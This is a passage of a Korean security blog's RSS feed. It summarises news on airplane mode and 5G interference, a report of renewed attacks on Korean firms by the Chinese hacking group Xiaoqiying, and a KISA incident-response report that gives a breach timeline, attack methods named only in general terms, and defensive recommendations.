&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #009a87;&quot;&gt;&lt;b&gt;기사 요약 :&lt;/b&gt;&lt;/span&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;비행기 탑승 때 무선통신 기능이 꺼진 상태 즉 비행기 모드로 휴대전화 전자기기를 사용하라고 하는데 그 이유는 이론적으로 항공기의 통신과 운항 시스템과 동일한 주파수 대역 내에서 신호를 방출해 전자기 간섭이 발생할 수 있기 때문이다. 이에 대해 1992년 연구에서는 이륙과 착륙을 제외한 단계에서는 큰 문제가 발생하지 않는 결과가 나왔지만, 최근의 5G 통신 기술은 아직까지 제대로 연구되지 않은 부분이 많아 위험성이 있으므로 사용 시 주의를 할 필요가 있다고 한다.&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 5G 통신을 비행기에서 사용하면 안되는 이유 :&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;비행기와 같은 제한된 5G 무선 네트워크 대역폭 범위에 많은 전자기기가 접속하게되면, 항공 운항에 필수적인 장치인 '전자고도계(Radio Altimeter)'가 사용하는 대역폭을 잠식할 가능성이 있기 때문이다. 이로 인해 착륙을 지원하는 공항 인근 내비게이션 시스템에 간섭이 발생할 수 있기 때문에 항공기에서는 '비행기 모드'를 사용해 전자기기를 이용한게 안전하다고 한다.&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style1&quot; /&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;류수연 기자, '비행기 탑승모드' 아직 필요한 이유는?, 농민신문, &lt;a href=&quot;https://n.news.naver.com/mnews/article/662/0000017779?sid=105%EF%BB%BF&quot;&gt;https://n.news.naver.com/mnews/article/662/0000017779?sid=105%EF%BB%BF&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;figure id=&quot;og_1681226786927&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;article&quot; data-og-title=&quot;&amp;lsquo;비행기 탑승모드&amp;rsquo; 아직 필요한 이유는?&quot; data-og-description=&quot;비행기에 탑승하면 &amp;ldquo;무선통신 기능이 꺼진 상태에서 휴대전화 등 전자기기를 사용하라&amp;quot;는 주의사항을 듣게 된다. 운항시 전파방해가 우려된다는 이유에서다. 특히 5G폰을 가진 경우라면 더욱 &quot; data-og-host=&quot;n.news.naver.com&quot; data-og-source-url=&quot;https://n.news.naver.com/mnews/article/662/0000017779?sid=105%EF%BB%BF&quot; data-og-url=&quot;https://n.news.naver.com/mnews/article/662/0000017779?sid=105%EF%BB%BF&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/buAeLZ/hySeVyFLK3/nNFjjiEjkHbSfIBWNfi3P0/img.jpg?width=590&amp;amp;height=481&amp;amp;face=0_0_590_481,https://scrap.kakaocdn.net/dn/X0cCH/hySeYB9YkZ/YPIYhuCmXCk4yWQQfhou3k/img.jpg?width=590&amp;amp;height=481&amp;amp;face=0_0_590_481&quot;&gt;&lt;a href=&quot;https://n.news.naver.com/mnews/article/662/0000017779?sid=105%EF%BB%BF&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://n.news.naver.com/mnews/article/662/0000017779?sid=105%EF%BB%BF&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/buAeLZ/hySeVyFLK3/nNFjjiEjkHbSfIBWNfi3P0/img.jpg?width=590&amp;amp;height=481&amp;amp;face=0_0_590_481,https://scrap.kakaocdn.net/dn/X0cCH/hySeYB9YkZ/YPIYhuCmXCk4yWQQfhou3k/img.jpg?width=590&amp;amp;height=481&amp;amp;face=0_0_590_481');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;&amp;lsquo;비행기 탑승모드&amp;rsquo; 아직 필요한 이유는?&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;비행기에 탑승하면 &amp;ldquo;무선통신 기능이 꺼진 상태에서 휴대전화 등 전자기기를 사용하라&quot;는 주의사항을 듣게 된다. 운항시 전파방해가 우려된다는 이유에서다. 특히 5G폰을 가진 경우라면 더욱&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;n.news.naver.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;</description>
      <category>[IT 및 보안]  /[IT 및 보안] 뉴스  </category>
      <author>제나나</author>
      <guid isPermaLink="true">https://jennana.tistory.com/627</guid>
      <comments>https://jennana.tistory.com/627#entry627comment</comments>
      <pubDate>Sun, 30 Apr 2023 22:22:46 +0900</pubDate>
    </item>
    <item>
      <title>[IT/보안뉴스] 중국 해킹그룹 샤오치잉, 국내 기업 또 다시 해킹 공격</title>
      <link>https://jennana.tistory.com/626</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;572&quot; data-origin-height=&quot;753&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bnwwrc/btscZUG4NaA/kSmhlu4Z6fmfx3WzJKVGZ0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bnwwrc/btscZUG4NaA/kSmhlu4Z6fmfx3WzJKVGZ0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bnwwrc/btscZUG4NaA/kSmhlu4Z6fmfx3WzJKVGZ0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fbnwwrc%2FbtscZUG4NaA%2FkSmhlu4Z6fmfx3WzJKVGZ0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;572&quot; height=&quot;753&quot; data-origin-width=&quot;572&quot; data-origin-height=&quot;753&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;div style=&quot;background-color: #ffffff; color: #434343; text-align: left;&quot;&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #009a87;&quot;&gt;&lt;b&gt;​기사 요약 :&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;중국 해킹그룹 샤오치잉이 1월 한국을 대상으로 해킹 선포를 한 후 해킹 공격 이후 2월 19일 해킹을 그만둔다고 선언한 후 4월 22일 다시 한국 기업인 한국인프라 웹사이트를 공격하기 시작하면서 한국 기업과 기관들의 준비가 필요해 보인다.&lt;/b&gt;&lt;br /&gt;&lt;b&gt;기존 샤오치잉의 해킹 수법은 이미 알려진 취약점(WAS 취약점) 및 해킹 툴(Sqlmap, Nuclei)을 이용하고 고전적인 공격 기법을 사용하기 때문에 기본 보안을 강화하면 침해사고에 대비할 수 있다고 KISA 관계자가 전했다고 한다.&lt;/b&gt;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style1&quot; /&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size14&quot;&gt;박은주 기자, [단독] 중국 해킹그룹 샤오치잉, 국내 기업 또 다시 해킹 공격, 보안뉴스, &lt;a href=&quot;https://www.boannews.com/media/view.asp?idx=117388&amp;amp;page=1&amp;amp;kind=1&quot;&gt;https://www.boannews.com/media/view.asp?idx=117388&amp;amp;page=1&amp;amp;kind=1&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;figure id=&quot;og_1682603986715&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;article&quot; data-og-title=&quot;[단독] 중국 해킹그룹 샤오치잉, 국내 기업  또 다시 해킹 공격&quot; data-og-description=&quot;중국의 해킹그룹 &amp;lsquo;샤오치잉(晓骑营)&amp;rsquo;이 한국의 인프라 구축 전문업체 &amp;lsquo;한국인프라&amp;rsquo;를 해킹한 것으로 드러났다. 한국인프라 웹페이지를 공격해 화면을 변조하는 디페이스 공격을 하고 일부&quot; data-og-host=&quot;www.boannews.com&quot; data-og-source-url=&quot;https://www.boannews.com/media/view.asp?idx=117388&amp;amp;page=1&amp;amp;kind=1&quot; data-og-url=&quot;http://www.boannews.com/media/view.asp?idx=117388&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/Z0mkX/hySpClNo6p/uomEEArjdYNh1Nhj3SHI10/img.jpg?width=1000&amp;amp;height=804&amp;amp;face=0_0_1000_804&quot;&gt;&lt;a href=&quot;https://www.boannews.com/media/view.asp?idx=117388&amp;amp;page=1&amp;amp;kind=1&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://www.boannews.com/media/view.asp?idx=117388&amp;amp;page=1&amp;amp;kind=1&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/Z0mkX/hySpClNo6p/uomEEArjdYNh1Nhj3SHI10/img.jpg?width=1000&amp;amp;height=804&amp;amp;face=0_0_1000_804');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;[단독] 중국 해킹그룹 샤오치잉, 국내 기업 또 다시 해킹 공격&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;중국의 해킹그룹 &amp;lsquo;샤오치잉(晓骑营)&amp;rsquo;이 한국의 인프라 구축 전문업체 &amp;lsquo;한국인프라&amp;rsquo;를 해킹한 것으로 드러났다. 한국인프라 웹페이지를 공격해 화면을 변조하는 디페이스 공격을 하고 일부&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;www.boannews.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>[IT 및 보안]  /[IT 및 보안] 뉴스  </category>
      <author>제나나</author>
      <guid isPermaLink="true">https://jennana.tistory.com/626</guid>
      <comments>https://jennana.tistory.com/626#entry626comment</comments>
      <pubDate>Fri, 28 Apr 2023 01:13:37 +0900</pubDate>
    </item>
    <item>
      <title>[KISA] 샤오치잉(晓骑营) 공격 그룹 침해사고 및 대응방안 보고서</title>
      <link>https://jennana.tistory.com/625</link>
      <description>&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot; /&gt;
&lt;h2 style=&quot;text-align: center;&quot; data-ke-size=&quot;size26&quot;&gt;&lt;b&gt;샤오치잉(晓骑营) 공격 그룹 침해사고 및 대응방안 보고서&lt;/b&gt;&lt;/h2&gt;
&lt;p style=&quot;text-align: center;&quot; data-ke-size=&quot;size16&quot;&gt;- 한국인터넷진흥원(KISA) 보고서&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;출처 : KISA 인터넷보호나라, &lt;a href=&quot;https://www.boho.or.kr/kr/bbs/view.do?searchCnd=&amp;amp;bbsId=B0000127&amp;amp;searchWrd=&amp;amp;menuNo=205021&amp;amp;pageIndex=1&amp;amp;categoryCode=&amp;amp;nttId=71066&quot;&gt;https://www.boho.or.kr/kr/bbs/view.do?searchCnd=&amp;amp;bbsId=B0000127&amp;amp;searchWrd=&amp;amp;menuNo=205021&amp;amp;pageIndex=1&amp;amp;categoryCode=&amp;amp;nttId=71066&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;figure id=&quot;og_1682603550365&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;website&quot; data-og-title=&quot;KISA 인터넷 보호나라&amp;amp;KrCERT&quot; data-og-description=&quot;KISA 인터넷 보호나라&amp;amp;KrCERT&quot; data-og-host=&quot;www.boho.or.kr&quot; data-og-source-url=&quot;https://www.boho.or.kr/kr/bbs/view.do?searchCnd=&amp;amp;bbsId=B0000127&amp;amp;searchWrd=&amp;amp;menuNo=205021&amp;amp;pageIndex=1&amp;amp;categoryCode=&amp;amp;nttId=71066&quot; data-og-url=&quot;http://www.boho.or.kr:80&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/pfiSy/hySqWprdYb/2wCOh8NmjX1VXNYk8Hrjjk/img.png?width=270&amp;amp;height=270&amp;amp;face=0_0_270_270,https://scrap.kakaocdn.net/dn/ciDgxs/hySpC0rpkM/jyiD4KbOrfxlHlID2uv7sK/img.png?width=270&amp;amp;height=270&amp;amp;face=0_0_270_270,https://scrap.kakaocdn.net/dn/cGCWIR/hySq4ntqw2/1IB6tYHTIKsaIL0mcAG8uK/img.png?width=1280&amp;amp;height=400&amp;amp;face=0_0_1280_400&quot;&gt;&lt;a href=&quot;https://www.boho.or.kr/kr/bbs/view.do?searchCnd=&amp;amp;bbsId=B0000127&amp;amp;searchWrd=&amp;amp;menuNo=205021&amp;amp;pageIndex=1&amp;amp;categoryCode=&amp;amp;nttId=71066&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://www.boho.or.kr/kr/bbs/view.do?searchCnd=&amp;amp;bbsId=B0000127&amp;amp;searchWrd=&amp;amp;menuNo=205021&amp;amp;pageIndex=1&amp;amp;categoryCode=&amp;amp;nttId=71066&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/pfiSy/hySqWprdYb/2wCOh8NmjX1VXNYk8Hrjjk/img.png?width=270&amp;amp;height=270&amp;amp;face=0_0_270_270,https://scrap.kakaocdn.net/dn/ciDgxs/hySpC0rpkM/jyiD4KbOrfxlHlID2uv7sK/img.png?width=270&amp;amp;height=270&amp;amp;face=0_0_270_270,https://scrap.kakaocdn.net/dn/cGCWIR/hySq4ntqw2/1IB6tYHTIKsaIL0mcAG8uK/img.png?width=1280&amp;amp;height=400&amp;amp;face=0_0_1280_400');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;KISA 인터넷 보호나라&amp;amp;KrCERT&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;KISA 인터넷 보호나라&amp;amp;KrCERT&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;www.boho.or.kr&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;595&quot; data-origin-height=&quot;840&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bDx0cu/btscYWr3LPM/X5s8rdQDDXSjykbnSDs3Gk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bDx0cu/btscYWr3LPM/X5s8rdQDDXSjykbnSDs3Gk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bDx0cu/btscYWr3LPM/X5s8rdQDDXSjykbnSDs3Gk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbDx0cu%2FbtscYWr3LPM%2FX5s8rdQDDXSjykbnSDs3Gk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;595&quot; height=&quot;840&quot; data-origin-width=&quot;595&quot; data-origin-height=&quot;840&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;목차&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;1. 개요&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; - 올해 1월 샤오치잉 해커조직이 대한민국을 겨냥하는 메시지와 함께 해킹 예고를 했는데, 침해사고 공격 기법에 대한 소개와 대응 방안에 대한 안내&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;2. 타임라인&lt;/p&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%; height: 260px;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot;&gt;
&lt;tbody&gt;
&lt;tr style=&quot;height: 40px;&quot;&gt;
&lt;td style=&quot;width: 25%; height: 40px; text-align: center;&quot;&gt;&lt;b&gt;2023년 1월 7일&lt;/b&gt;&lt;/td&gt;
&lt;td style=&quot;width: 75%; height: 40px;&quot;&gt;A社 내부자료를 샤오치잉 Github Pages에 공개(개인정보 160여명)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 40px;&quot;&gt;
&lt;td style=&quot;width: 25%; height: 40px; text-align: center;&quot;&gt;&lt;b&gt;2023년 1월 20일&lt;/b&gt;&lt;/td&gt;
&lt;td style=&quot;width: 75%; height: 40px;&quot;&gt;B社 홈페이지 웹페이지 변조 후 샤오치잉 텔레그램 채널에 공개(개인정보 70여명)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 60px;&quot;&gt;
&lt;td style=&quot;width: 25%; height: 60px; text-align: center;&quot;&gt;&lt;b&gt;2023년 1월 21일&lt;/b&gt;&lt;/td&gt;
&lt;td style=&quot;width: 75%; height: 60px;&quot;&gt;B社 내부정보를 샤오치잉 홈페이지에 공개 &lt;br /&gt;C社 서버의 내부 정보(디렉터리 및 파일 목록) 일부를 샤오치잉 텔레그램 채널에 공개&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 40px;&quot;&gt;
&lt;td style=&quot;width: 25%; height: 40px; text-align: center;&quot;&gt;&lt;b&gt;2023년 1월 22일&lt;/b&gt;&lt;/td&gt;
&lt;td style=&quot;width: 75%; height: 40px;&quot;&gt;KISA 보안공지: 국내 홈페이지 변조 관련 민간부문 보안 강화 권고 안내&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 20px;&quot;&gt;
&lt;td style=&quot;width: 25%; height: 20px; text-align: center;&quot;&gt;&lt;b&gt;2023년 1월 24일&lt;/b&gt;&lt;/td&gt;
&lt;td style=&quot;width: 75%; height: 20px;&quot;&gt;샤오치잉 텔레그램 채널에 한국인터넷진흥원 공격 예고&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 20px;&quot;&gt;
&lt;td style=&quot;width: 25%; height: 20px; text-align: center;&quot;&gt;&lt;b&gt;2023년 1월 24일 ~ 26일&lt;/b&gt;&lt;/td&gt;
&lt;td style=&quot;width: 75%; height: 20px;&quot;&gt;C社 서버에서 DB 삭제, 웹페이지 변조 후 확보한 DB Dump 파일을 샤오치잉 텔레그램 채널 에 공개&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 20px;&quot;&gt;
&lt;td style=&quot;width: 25%; height: 20px; text-align: center;&quot;&gt;&lt;b&gt;2023년 2월 14일&lt;/b&gt;&lt;/td&gt;
&lt;td style=&quot;width: 75%; height: 20px;&quot;&gt;WebLogic 취약점을 악용해서 D社, E社, F社 홈페이지 침투 후 웹페이지 변조&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 20px;&quot;&gt;
&lt;td style=&quot;width: 25%; height: 20px; text-align: center;&quot;&gt;&lt;b&gt;2023년 2월 18일&lt;/b&gt;&lt;/td&gt;
&lt;td style=&quot;width: 75%; height: 20px;&quot;&gt;A社 내부자료를 추가 확보 후 샤오치잉 홈페이지에 공개(개인정보 22,000여명)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;3. 공격기법&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; 1) 취약점 스캔 -&amp;nbsp; sqlmap, Nuclei 사용&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; 2) 취약한 웹 서비스를 통한 내부 침투 - SQL Injection, 계정 설정 파일 접근, 오래된 버전의 WebLogic 악용&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; 3) 피해 발생 - 내부정보 탈취, 웹사이트 변조 및 무단생성&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; 4) 해킹 사실 공개&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;4. 대응 방안&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; 1) SQL Injection 공격 예방 - 웹 서버 시큐어 코딩, 웹 방화벽 설치&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; 2) 계정정보 관리 - 서버 내 계정정보 업로드 여부 점검&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; 3) 운영체제 및 소프트웨어 버전 업그레이드&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; 4) 중요자료 백업&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; 5) 로그 설정 - 웹 로그 주기적 점검 및 백업, WebLogic 로그 저장 연장&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; 6) 한국인터넷진흥원 정보보호 서비스 활용&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;5. 결론&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; &amp;gt;&amp;gt; 신고접수 된 피해기업 대부분이 보안 투자를 많이 하기 어려운 소규모 기업 또는 기관&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&amp;gt;&amp;gt; 고전적인 기법(SQL Injection, 알려진 취약점 악용)을 사용&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;Appendix - 악성파일(웹셸) MD5 Hash, 공격자 IP&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;* 보고서 링크 :&amp;nbsp;&lt;a href=&quot;https://kisa-irteam.notion.site/09d3e4c83a784380acc3b36271a1f58a&quot;&gt;https://kisa-irteam.notion.site/09d3e4c83a784380acc3b36271a1f58a&lt;/a&gt;&lt;/p&gt;
&lt;figure id=&quot;og_1682602969304&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;article&quot; data-og-title=&quot;샤오치잉(晓骑营) 공격 그룹 침해사고 및 대응방안 보고서&quot; data-og-description=&quot;1. 개요&quot; data-og-host=&quot;kisa-irteam.notion.site&quot; data-og-source-url=&quot;https://kisa-irteam.notion.site/09d3e4c83a784380acc3b36271a1f58a&quot; data-og-url=&quot;https://kisa-irteam.notion.site/09d3e4c83a784380acc3b36271a1f58a&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/Pprr6/hySq3hNSBQ/oZkKs69yCVlufScD0q8Gf0/img.png?width=2000&amp;amp;height=2722&amp;amp;face=0_0_2000_2722&quot;&gt;&lt;a href=&quot;https://kisa-irteam.notion.site/09d3e4c83a784380acc3b36271a1f58a&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://kisa-irteam.notion.site/09d3e4c83a784380acc3b36271a1f58a&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/Pprr6/hySq3hNSBQ/oZkKs69yCVlufScD0q8Gf0/img.png?width=2000&amp;amp;height=2722&amp;amp;face=0_0_2000_2722');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;샤오치잉(晓骑营) 공격 그룹 침해사고 및 대응방안 보고서&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;1. 개요&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;kisa-irteam.notion.site&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;파일 :&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;fileblock&quot; data-ke-align=&quot;alignCenter&quot;&gt;&lt;a href=&quot;https://blog.kakaocdn.net/dn/4I2J1/btscYqfJ8a6/duH9keSexxdgkgHWTl7s21/%EC%83%A4%EC%98%A4%EC%B9%98%EC%9E%89%28%E6%99%93%E9%AA%91%E8%90%A5%29_%EA%B3%B5%EA%B2%A9_%EA%B7%B8%EB%A3%B9_%EC%B9%A8%ED%95%B4%EC%82%AC%EA%B3%A0_%EB%B0%8F_%EB%8C%80%EC%9D%91%EB%B0%A9%EC%95%88_%EB%B3%B4%EA%B3%A0%EC%84%9C.pdf?attach=1&amp;amp;knm=tfile.pdf&quot; class=&quot;&quot;&gt;
    &lt;div class=&quot;image&quot;&gt;&lt;/div&gt;
    &lt;div class=&quot;desc&quot;&gt;&lt;div class=&quot;filename&quot;&gt;&lt;span class=&quot;name&quot;&gt;샤오치잉(晓骑营)_공격_그룹_침해사고_및_대응방안_보고서.pdf&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;size&quot;&gt;4.58MB&lt;/div&gt;
&lt;/div&gt;
  &lt;/a&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;</description>
      <category>[IT 및 보안]  /[IT 및 보안] 보고서  </category>
      <author>제나나</author>
      <guid isPermaLink="true">https://jennana.tistory.com/625</guid>
      <comments>https://jennana.tistory.com/625#entry625comment</comments>
